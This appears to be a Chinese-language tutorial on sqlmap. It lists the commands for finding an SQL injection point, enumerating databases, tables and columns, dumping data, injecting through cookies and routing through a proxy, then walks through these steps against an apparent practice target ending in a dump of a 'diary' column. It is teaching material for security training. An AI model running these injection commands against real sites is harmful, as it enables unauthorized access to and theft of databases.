【SQLMAP】02 实战
一、常用命令
检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 指定数据库名表名字段dump出指定字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump cookie 注入 --cookie=COOKIE 在需要登录的地方,需要登录后的cookie 执行指定的 SQL 语句 --sql-query=QUERY 代理注入 --proxy="http://127.0.0.1:8087"二、找到目标数据的过程 =>先确定数据在哪个数据库 =>再确定是数据库中的哪一张表 =>确定表里分别有哪些字段 =>最后根据字段来取出指定数据 三、实战 1、检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" (1)明确目标地址:https://rimovni.exeye.run/kanwaki/diary?id=1 (2)打开sqlmap的快捷方式 (3)输入命令,检查注入点:
python sqlmap.py -u "目标地址"2、列数据库信息
sqlmap -u "http://ooxx.com/a.php?id=1" --dbs python sqlmap.py -u "目标地址" --dbs3、指定数据库名列出所有表
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables(1)拿到2、查询到的数据库名
// information数据库是预设的数据库一般不在此处 information_schema twosecu1_vuln_02(2)替换如下命令中的dbsname
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 --tables(3)结果 4、指定 数据库名 表名,列出所有字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns(1)拿到3、查询到的数据表名:book、hacker
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T book --columns python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker --columns(2)结果 5、指定数据库名表名字段dump出指定字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump(1)拿到4、查询到的字段名diary、id(实际场景是破解日记中的内容,so选择diary)
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker -C diary --dump(2)原文件 6、cookie 注入
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie7、执行指定的 SQL 语句
--sql-query=QUERY8、代理注入
--proxy="http://127.0.0.1:8087"参考: https://zhishihezi.net/b/03c82a3d82cdf5a1d066e0e2423e48dd#start